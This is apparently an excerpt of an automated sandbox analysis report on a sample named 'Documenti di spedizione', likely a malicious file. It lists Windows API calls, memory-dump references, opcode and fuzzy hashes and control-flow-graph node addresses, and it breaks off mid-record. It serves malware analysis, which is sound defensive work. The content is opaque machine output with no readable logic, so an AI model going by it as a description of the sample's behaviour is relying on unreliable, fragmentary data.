                                            • Instruction Fuzzy Hash: 82D0C7E2419E709EF30352549D04B9F6E98DF16750F0A14A2F141E6192D77C5D418BAD
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                            • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                            • GlobalFree.KERNEL32(?), ref: 100011C7
                                            • GlobalFree.KERNEL32(?), ref: 100011F5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2629006314.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2628993182.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629018868.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629030864.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc
                                            • String ID:
                                            • API String ID: 1780285237-0
                                            • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                            • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                            • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                            • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ADF
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AF7
                                            • CharNextA.USER32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B08
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                            • Instruction ID: b8bae3ead32ec2695fa88c6f2b94aa478c41e31f8fdb951db119f3f4d21ee890
                                            • Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                            • Instruction Fuzzy Hash: C1F0C231605518BFCB029FA5DC4099FBBB8EF46350B2140A5F800F7250D274FE019BA9

                                            Execution Graph

                                            Execution Coverage:8.3%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:28
                                            Total number of Limit Nodes:3
                                            execution_graph 40177 39200040 40178 39200082 40177->40178 40180 39200089 40177->40180 40179 392000da CallWindowProcW 40178->40179 40178->40180 40179->40180 40181 38ce3458 DuplicateHandle 40182 38ce34ee 40181->40182 40183 392021f8 40184 39202220 40183->40184 40187 3920224c 40183->40187 40185 39202229 40184->40185 40188 39201764 40184->40188 40189 3920176f 40188->40189 40191 39202543 40189->40191 40192 39201780 40189->40192 40191->40187 40193 39202578 OleInitialize 40192->40193 40194 392025dc 40193->40194 40194->40191 40195 38ce3210 40196 38ce3256 GetCurrentProcess 40195->40196 40198 38ce32a8 GetCurrentThread 40196->40198 40199 38ce32a1 40196->40199 40200 38ce32de 40198->40200 40201 38ce32e5 GetCurrentProcess 40198->40201 40199->40198 40200->40201 40204 38ce331b 40201->40204 40202 38ce3343 GetCurrentThreadId 40203 38ce3374 40202->40203 40204->40202 40205 38ced7f0 40206 38ced858 CreateWindowExW 40205->40206 40208 38ced914 40206->40208

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 526 38cf3158-38cf3179 527 38cf317b-38cf317e 526->527 528 38cf391f-38cf3922 527->528 529 38cf3184-38cf31a3 527->529 530 38cf3948-38cf394a 528->530 531 38cf3924-38cf3943 528->531 538 38cf31bc-38cf31c6 529->538 539 38cf31a5-38cf31a8 529->539 533 38cf394c 530->533 534 38cf3951-38cf3954 530->534 531->530 533->534 534->527 535 38cf395a-38cf3963 534->535 543 38cf31cc-38cf31db 538->543 539->538 541 38cf31aa-38cf31ba 539->541 541->543 652 38cf31dd call 38cf3978 543->652 653 38cf31dd call 38cf3970 543->653 545 38cf31e2-38cf31e7 546 38cf31e9-38cf31ef 545->546 547 38cf31f4-38cf34d1 545->547 546->535 568 38cf34d7-38cf3586 547->568 569 38cf3911-38cf391e 547->569 578 38cf35af 568->578 579 38cf3588-38cf35ad 568->579 581 38cf35b8-38cf35cb 578->581 579->581 583 38cf38f8-38cf3904 581->583 584 38cf35d1-38cf35f3 581->584 583->568 585 38cf390a 583->585 584->583 587 38cf35f9-38cf3603 584->587 585->569 587->583 588 38cf3609-38cf3614 587->588 588->583 589 38cf361a-38cf36f0 588->589 601 38cf36fe-38cf372e 589->601 602 38cf36f2-38cf36f4 589->602 606 38cf373c-38cf3748 601->606 607 38cf3730-38cf3732 601->607 602->601 608 38cf374a-38cf374e 606->608 609 38cf37a8-38cf37ac 606->609 607->606 608->609 610 38cf3750-38cf377a 608->610 611 38cf38e9-38cf38f2 609->611 612 38cf37b2-38cf37ee 609->612 619 38cf377c-38cf377e 610->619 620 38cf3788-38cf37a5 610->620 611->583 611->589 622 38cf37fc-38cf380a 612->622 623 38cf37f0-38cf37f2 612->623 619->620 620->609 626 38cf380c-38cf3817 622->626 627 38cf3821-38cf382c 622->627 623->622 626->627 632 38cf3819 626->632 630 38cf382e-38cf3834 627->630 631 38cf3844-38cf3855 627->631 633 38cf3838-38cf383a 630->633 634 38cf3836 630->634 636 38cf386d-38cf3879 631->636 637 38cf3857-38cf385d 631->637 632->627 633->631 634->631 641 38cf387b-38cf3881 636->641 642 38cf3891-38cf38e2 636->642 638 38cf385f 637->638 639 38cf3861-38cf3863 637->639 638->636 639->636 643 38cf3885-38cf3887 641->643 644 38cf3883 641->644 642->611 643->642 644->642 652->545 653->545
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                            • API String ID: 0-3723351465
                                            • Opcode ID: 177ab404b5b4881254e218298f8e1afe9ba83de0964f3136134e96b6f12f02f0
                                            • Instruction ID: 913845c5daab5f7adad0906ee2ab69fba221650be5d52f5be40e4626b19040b0
                                            • Opcode Fuzzy Hash: 177ab404b5b4881254e218298f8e1afe9ba83de0964f3136134e96b6f12f02f0
                                            • Instruction Fuzzy Hash: 5C324E30E1071ADFDB15DF75C89459DB7B2BFC9304F60C66AD449A7224EB30A986CB90
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8752a67370720325fca99aec47b1e67fd38c5eaa548922f61455759627e25c05
                                            • Instruction ID: ff14fcaa0279cd1e3b357bd317a1510cb2d3483c81ca3fb736472b03d23949ef
                                            • Opcode Fuzzy Hash: 8752a67370720325fca99aec47b1e67fd38c5eaa548922f61455759627e25c05
                                            • Instruction Fuzzy Hash: AA53F731D10B1A8ADB51EF68C8546A9F7B1FF99300F11D79AE05877221EB70AAD4CF81
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8172c927c95ad5131785ed80172af6a2e146f60e004ae0f1103c5307eb43828a
                                            • Instruction ID: 0333ec5e130e2ed3166e352952ecdf85e61bd8a3b7ff81daf52802a944c61bdf
                                            • Opcode Fuzzy Hash: 8172c927c95ad5131785ed80172af6a2e146f60e004ae0f1103c5307eb43828a
                                            • Instruction Fuzzy Hash: F2D19D34B002058FCB54DFA9D594AAEB7F2EF89310F24842AE506E73A5DB35DD42CB52
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a6f0a1c36a20f3c3990172a8acc1ed864f5d3441f0649fd0c08fadcb7f549ed3
                                            • Instruction ID: 6384783132af37a57446a810513d050a34af30d5a1330dca46c444541eb633bd
                                            • Opcode Fuzzy Hash: a6f0a1c36a20f3c3990172a8acc1ed864f5d3441f0649fd0c08fadcb7f549ed3
                                            • Instruction Fuzzy Hash: 61B13F70E00309CFDF54CFA9D9857ADBBF2AF88314F14812AE819A7354EB749985CB91
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 025f5cd62e62d0a00ec965c0145d2ee379cc1e27b0960e290a92bf13eb413195
                                            • Instruction ID: 48b13a75c1345474223443e127fd492f1453bac839e51c8e8b88ec4016115470
                                            • Opcode Fuzzy Hash: 025f5cd62e62d0a00ec965c0145d2ee379cc1e27b0960e290a92bf13eb413195
                                            • Instruction Fuzzy Hash: DDB12C70E003098FDF54CFA9C98579DBBF2AF88714F14812AD819EB354EB749885CB95
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3246340704.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c13bf43942db07feffd93b38945ac961470e38bfa21b4263394582ca3319b0b
                                            • Instruction ID: e45ed5d3e2d4e8273f67816244d05afd2b152a0496c920e0b53731f28532cf9f
                                            • Opcode Fuzzy Hash: 4c13bf43942db07feffd93b38945ac961470e38bfa21b4263394582ca3319b0b
                                            • Instruction Fuzzy Hash: 9F914C70E00309DFDF54CFA9C98579DBBF2AF88314F14812AE415A7394EB749985CBA2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 654 38ce3202-38ce329f GetCurrentProcess 658 38ce32a8-38ce32dc GetCurrentThread 654->658 659 38ce32a1-38ce32a7 654->659 660 38ce32de-38ce32e4 658->660 661 38ce32e5-38ce3319 GetCurrentProcess 658->661 659->658 660->661 662 38ce331b-38ce3321 661->662 663 38ce3322-38ce333d call 38ce33e0 661->663 662->663 667 38ce3343-38ce3372 GetCurrentThreadId 663->667 668 38ce337b-38ce33dd 667->668 669 38ce3374-38ce337a 667->669 669->668
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 38CE328E
                                            • GetCurrentThread.KERNEL32 ref: 38CE32CB
                                            • GetCurrentProcess.KERNEL32 ref: 38CE3308
                                            • GetCurrentThreadId.KERNEL32 ref: 38CE3361
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3268996018.0000000038CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38ce0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 07898e9171b2a2eada02c24b2931586d785f80c8187813b8ab57ebd4427f4ac0
                                            • Instruction ID: 968692cbd00f87bdaad0275f1c63cb69c194073fd735222da4094257e02d04c8
                                            • Opcode Fuzzy Hash: 07898e9171b2a2eada02c24b2931586d785f80c8187813b8ab57ebd4427f4ac0
                                            • Instruction Fuzzy Hash: 915144B09002498FDB04DFA9D548BAEBBF1EF88300F208459E499B7260D738A945CF65

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 676 38ce3210-38ce329f GetCurrentProcess 680 38ce32a8-38ce32dc GetCurrentThread 676->680 681 38ce32a1-38ce32a7 676->681 682 38ce32de-38ce32e4 680->682 683 38ce32e5-38ce3319 GetCurrentProcess 680->683 681->680 682->683 684 38ce331b-38ce3321 683->684 685 38ce3322-38ce333d call 38ce33e0 683->685 684->685 689 38ce3343-38ce3372 GetCurrentThreadId 685->689 690 38ce337b-38ce33dd 689->690 691 38ce3374-38ce337a 689->691 691->690
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 38CE328E
                                            • GetCurrentThread.KERNEL32 ref: 38CE32CB
                                            • GetCurrentProcess.KERNEL32 ref: 38CE3308
                                            • GetCurrentThreadId.KERNEL32 ref: 38CE3361
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3268996018.0000000038CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38ce0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: fda579bc30badd560091e493ef595c0b4a9ba25334958b756fea3b7778091634
                                            • Instruction ID: f2ded6ba54c519c45f5fd06df51c9614ea0eb40d516ef53efa7fc9162e1e62b1
                                            • Opcode Fuzzy Hash: fda579bc30badd560091e493ef595c0b4a9ba25334958b756fea3b7778091634
                                            • Instruction Fuzzy Hash: B15133B09006498FDB04DFAAD648BEEBBF5FF88310F208459E459B7260D738A945CF65

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 698 38cf9210-38cf9235 699 38cf9237-38cf923a 698->699 700 38cf923c-38cf925b 699->700 701 38cf9260-38cf9263 699->701 700->701 702 38cf9269-38cf927e 701->702 703 38cf9b23-38cf9b25 701->703 710 38cf9296-38cf92ac 702->710 711 38cf9280-38cf9286 702->711 704 38cf9b2c-38cf9b2f 703->704 705 38cf9b27 703->705 704->699 707 38cf9b35-38cf9b3f 704->707 705->704 715 38cf92b7-38cf92b9 710->715 712 38cf928a-38cf928c 711->712 713 38cf9288 711->713 712->710 713->710 716 38cf92bb-38cf92c1 715->716 717 38cf92d1-38cf9342 715->717 718 38cf92c5-38cf92c7 716->718 719 38cf92c3 716->719 728 38cf936e-38cf938a 717->728 729 38cf9344-38cf9367 717->729 718->717 719->717 734 38cf938c-38cf93af 728->734 735 38cf93b6-38cf93d1 728->735 729->728 734->735 740 38cf93fc-38cf9417 735->740 741 38cf93d3-38cf93f5 735->741 746 38cf9419-38cf943b 740->746 747 38cf9442-38cf944c 740->747 741->740 746->747 748 38cf944e-38cf9457 747->748 749 38cf945c-38cf94d6 747->749 748->707 755 38cf94d8-38cf94f6 749->755 756 38cf9523-38cf9538 749->756 760 38cf94f8-38cf9507 755->760 761 38cf9512-38cf9521 755->761 756->703 760->761 761->755 761->756
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q$$]q
                                            • API String ID: 0-858218434
                                            • Opcode ID: 6a69aa9571e82a2b6f5c94fc7853375e89f703af9e8c3b1e3f865397cf53b920
                                            • Instruction ID: ad9708f9c76f15a8db70237aaa2753718e113a52676e3ce7f0ac3fc522425977
                                            • Opcode Fuzzy Hash: 6a69aa9571e82a2b6f5c94fc7853375e89f703af9e8c3b1e3f865397cf53b920
                                            • Instruction Fuzzy Hash: 12914E74B0020A8FEB54DF69D850B9EB3F6BF84744F10856AC909EB345EA319D478B92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 764 38cfd008-38cfd023 765 38cfd025-38cfd028 764->765 766 38cfd02a-38cfd06c 765->766 767 38cfd071-38cfd074 765->767 766->767 768 38cfd0bd-38cfd0c0 767->768 769 38cfd076-38cfd0b8 767->769 770 38cfd0cf-38cfd0d2 768->770 771 38cfd0c2-38cfd0c4 768->771 769->768 775 38cfd11b-38cfd11e 770->775 776 38cfd0d4-38cfd0e3 770->776 773 38cfd3af-38cfd3b8 771->773 774 38cfd0ca 771->774 779 38cfd3ba-38cfd3bf 773->779 780 38cfd3c7-38cfd3d3 773->780 774->770 783 38cfd167-38cfd16a 775->783 784 38cfd120-38cfd162 775->784 781 38cfd0e5-38cfd0ea 776->781 782 38cfd0f2-38cfd0fe 776->782 779->780 785 38cfd3d9-38cfd3ed 780->785 786 38cfd4e4-38cfd4e9 780->786 781->782 787 38cfda25-38cfda3a 782->787 788 38cfd104-38cfd116 782->788 789 38cfd16c-38cfd171 783->789 790 38cfd174-38cfd177 783->790 784->783 806 38cfd3f3-38cfd405 785->806 807 38cfd4f1 785->807 786->807 805 38cfda3b-38cfda3c 787->805 788->775 789->790 794 38cfd179-38cfd1bb 790->794 795 38cfd1c0-38cfd1c3 790->795 794->795 799 38cfd1c5-38cfd1db 795->799 800 38cfd1e0-38cfd1e3 795->800 799->800 808 38cfd22c-38cfd22f 800->808 809 38cfd1e5-38cfd227 800->809 805->805 813 38cfda3e-38cfda5e 805->813 830 38cfd429-38cfd42b 806->830 831 38cfd407-38cfd40d 806->831 812 38cfd4f4-38cfd500 807->812 808->812 815 38cfd235-38cfd238 808->815 809->808 812->776 820 38cfd506-38cfd7f3 812->820 821 38cfda60-38cfda63 813->821 823 38cfd23a-38cfd27c 815->823 824 38cfd281-38cfd284 815->824 978 38cfda1a-38cfda24 820->978 979 38cfd7f9-38cfd7ff 820->979 828 38cfda65 call 38cfdb7d 821->828 829 38cfda72-38cfda75 821->829 823->824 826 38cfd2cd-38cfd2d0 824->826 827 38cfd286-38cfd2c8 824->827 838 38cfd2f3-38cfd2f6 826->838 839 38cfd2d2-38cfd2ee 826->839 827->826 846 38cfda6b-38cfda6d 828->846 835 38cfda98-38cfda9b 829->835 836 38cfda77-38cfda93 829->836 844 38cfd435-38cfd441 830->844 841 38cfd40f 831->841 842 38cfd411-38cfd41d 831->842 847 38cfdace-38cfdad0 835->847 848 38cfda9d-38cfdac9 835->848 836->835 849 38cfd33f-38cfd342 838->849 850 38cfd2f8-38cfd33a 838->850 839->838 851 38cfd41f-38cfd427 841->851 842->851 876 38cfd44f 844->876 877 38cfd443-38cfd44d 844->877 846->829 861 38cfdad7-38cfdada 847->861 862 38cfdad2 847->862 848->847 855 38cfd344-38cfd346 849->855 856 38cfd351-38cfd354 849->856 850->849 851->844 855->807 865 38cfd34c 855->865 866 38cfd39d-38cfd39f 856->866 867 38cfd356-38cfd365 856->867 861->821 870 38cfdadc-38cfdaeb 861->870 862->861 865->856 879 38cfd3a6-38cfd3a9 866->879 880 38cfd3a1 866->880 874 38cfd367-38cfd36c 867->874 875 38cfd374-38cfd380 867->875 893 38cfdaed-38cfdb50 call 38cf6670 870->893 894 38cfdb52-38cfdb67 870->894 874->875 875->787 885 38cfd386-38cfd398 875->885 884 38cfd454-38cfd456 876->884 877->884 879->765 879->773 880->879 884->807 890 38cfd45c-38cfd478 call 38cf6670 884->890 885->866 911 38cfd47a-38cfd47f 890->911 912 38cfd487-38cfd493 890->912 893->894 911->912 912->786 914 38cfd495-38cfd4e2 912->914 914->807 980 38cfd80e-38cfd817 979->980 981 38cfd801-38cfd806 979->981 980->787 982 38cfd81d-38cfd830 980->982 981->980 984 38cfda0a-38cfda14 982->984 985 38cfd836-38cfd83c 982->985 984->978 984->979 986 38cfd83e-38cfd843 985->986 987 38cfd84b-38cfd854 985->987 986->987 987->787 988 38cfd85a-38cfd87b 987->988 991 38cfd87d-38cfd882 988->991 992 38cfd88a-38cfd893 988->992 991->992 992->787 993 38cfd899-38cfd8b6 992->993 993->984 996 38cfd8bc-38cfd8c2 993->996 996->787 997 38cfd8c8-38cfd8e1 996->997 999 38cfd9fd-38cfda04 997->999 1000 38cfd8e7-38cfd90e 997->1000 999->984 999->996 1000->787 1003 38cfd914-38cfd91e 1000->1003 1003->787 1004 38cfd924-38cfd93b 1003->1004 1006 38cfd93d-38cfd948 1004->1006 1007 38cfd94a-38cfd965 1004->1007 1006->1007 1007->999 1012 38cfd96b-38cfd984 call 38cf6670 1007->1012 1016 38cfd986-38cfd98b 1012->1016 1017 38cfd993-38cfd99c 1012->1017 1016->1017 1017->787 1018 38cfd9a2-38cfd9f6 1017->1018 1018->999
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q$$]q
                                            • API String ID: 0-182748909
                                            • Opcode ID: 0ceb518ef56541092157e8721f88047183a2c2c633965cd3277f4a68cb0ee3d5
                                            • Instruction ID: 148a921316007bca9ede00d2d8ef15e40f411201a83b6b4964d898955290c00c
                                            • Opcode Fuzzy Hash: 0ceb518ef56541092157e8721f88047183a2c2c633965cd3277f4a68cb0ee3d5
                                            • Instruction Fuzzy Hash: 54623A30A0020A8FDB55DF68D590A4DB7B6FF84344B208A79D109EF269DB79ED47CB81

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1026 38cf4c68-38cf4c8c 1027 38cf4c8e-38cf4c91 1026->1027 1028 38cf4c93-38cf4cad 1027->1028 1029 38cf4cb2-38cf4cb5 1027->1029 1028->1029 1030 38cf4cbb-38cf4db3 1029->1030 1031 38cf5394-38cf5396 1029->1031 1049 38cf4db9-38cf4e06 call 38cf551c 1030->1049 1050 38cf4e36-38cf4e3d 1030->1050 1033 38cf539d-38cf53a0 1031->1033 1034 38cf5398 1031->1034 1033->1027 1035 38cf53a6-38cf53b3 1033->1035 1034->1033 1063 38cf4e0c-38cf4e28 1049->1063 1051 38cf4e43-38cf4eb3 1050->1051 1052 38cf4ec1-38cf4eca 1050->1052 1069 38cf4ebe 1051->1069 1070 38cf4eb5 1051->1070 1052->1035 1066 38cf4e2a 1063->1066 1067 38cf4e33 1063->1067 1066->1067 1067->1050 1069->1052 1070->1069
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fbq$XPbq$\Obq
                                            • API String ID: 0-4057264190
                                            • Opcode ID: 52fab6b93de1bf181df9957c40b0be428d04a5e2ecdb393c2a605e6fa49f5d86
                                            • Instruction ID: 36e3ff54520e23eff5a956298a4995c8b64ee28e3d9286e52d76c9e6981c659f
                                            • Opcode Fuzzy Hash: 52fab6b93de1bf181df9957c40b0be428d04a5e2ecdb393c2a605e6fa49f5d86
                                            • Instruction Fuzzy Hash: 4D616E30A002089FEB549FA5C855B9EBBF6FF88300F208529E109EB395DB758D46CF91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1580 38cf8138-38cf8157 1581 38cf8159-38cf815c 1580->1581 1582 38cf8162-38cf8171 1581->1582 1583 38cf8391-38cf8394 1581->1583 1591 38cf8173-38cf818e 1582->1591 1592 38cf8190-38cf81d4 1582->1592 1584 38cf83b7-38cf83ba 1583->1584 1585 38cf8396-38cf83b2 1583->1585 1586 38cf8465-38cf8467 1584->1586 1587 38cf83c0-38cf83cc 1584->1587 1585->1584 1589 38cf846e-38cf8471 1586->1589 1590 38cf8469 1586->1590 1594 38cf83d7-38cf83d9 1587->1594 1589->1581 1595 38cf8477-38cf8480 1589->1595 1590->1589 1591->1592 1603 38cf81da-38cf81eb 1592->1603 1604 38cf8365-38cf837a 1592->1604 1598 38cf83db-38cf83e1 1594->1598 1599 38cf83f1-38cf83f5 1594->1599 1601 38cf83e5-38cf83e7 1598->1601 1602 38cf83e3 1598->1602 1605 38cf83f7-38cf8401 1599->1605 1606 38cf8403 1599->1606 1601->1599 1602->1599 1613 38cf81f1-38cf820e 1603->1613 1614 38cf8350-38cf835f 1603->1614 1604->1583 1609 38cf8408-38cf840a 1605->1609 1606->1609 1611 38cf840c-38cf840f 1609->1611 1612 38cf841b-38cf8454 1609->1612 1611->1595 1612->1582 1624 38cf845a-38cf8464 1612->1624 1613->1614 1621 38cf8214-38cf830a call 38cf6670 1613->1621 1614->1603 1614->1604 1647 38cf830c-38cf8316 1621->1647 1648 38cf8318 1621->1648 1649 38cf831d-38cf831f 1647->1649 1648->1649 1649->1614 1650 38cf8321-38cf8326 1649->1650 1651 38cf8328-38cf8332 1650->1651 1652 38cf8334 1650->1652 1653 38cf8339-38cf833b 1651->1653 1652->1653 1653->1614 1654 38cf833d-38cf8349 1653->1654 1654->1614
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $]q$$]q
                                            • API String ID: 0-127220927
                                            • Opcode ID: a8ca7f33403e4f8e97946ddfab173c6149f2ecbfd5686bbc14bd01a2ce023a53
                                            • Instruction ID: 249370cb3d9d5dd62eddca6bb19ff59f21f2e8ffa0cdbe16ce8410c6d26f056c
                                            • Opcode Fuzzy Hash: a8ca7f33403e4f8e97946ddfab173c6149f2ecbfd5686bbc14bd01a2ce023a53
                                            • Instruction Fuzzy Hash: 2C918C34B002068BEB58DF79D49066EB7A6FF84344F108539D909EB3A4DB76EC478B91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1656 38cfafe8-38cfb006 1657 38cfb008-38cfb00b 1656->1657 1658 38cfb00d-38cfb017 1657->1658 1659 38cfb018-38cfb01b 1657->1659 1660 38cfb01d call 38cfb318 1659->1660 1661 38cfb02a-38cfb02d 1659->1661 1666 38cfb023-38cfb025 1660->1666 1662 38cfb02f-38cfb04b 1661->1662 1663 38cfb050-38cfb053 1661->1663 1662->1663 1664 38cfb055-38cfb059 1663->1664 1665 38cfb060-38cfb063 1663->1665 1668 38cfb05b 1664->1668 1669 38cfb069-38cfb0a4 1664->1669 1665->1669 1670 38cfb2cc-38cfb2ce 1665->1670 1666->1661 1668->1665 1676 38cfb0aa-38cfb0b6 1669->1676 1677 38cfb297-38cfb2aa 1669->1677 1671 38cfb2d5-38cfb2d8 1670->1671 1672 38cfb2d0 1670->1672 1671->1657 1673 38cfb2de-38cfb2e8 1671->1673 1672->1671 1680 38cfb0b8-38cfb0d1 1676->1680 1681 38cfb0d6-38cfb11a 1676->1681 1678 38cfb2ac 1677->1678 1682 38cfb2ad 1678->1682 1680->1678 1688 38cfb11c-38cfb12e 1681->1688 1689 38cfb136-38cfb175 1681->1689 1682->1682 1688->1689 1692 38cfb25c-38cfb271 1689->1692 1693 38cfb17b-38cfb256 call 38cf6670 1689->1693 1692->1677 1693->1692
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3269014634.0000000038CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_38cf0000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: XM$XM
                                            • API String ID: 0-1114951136
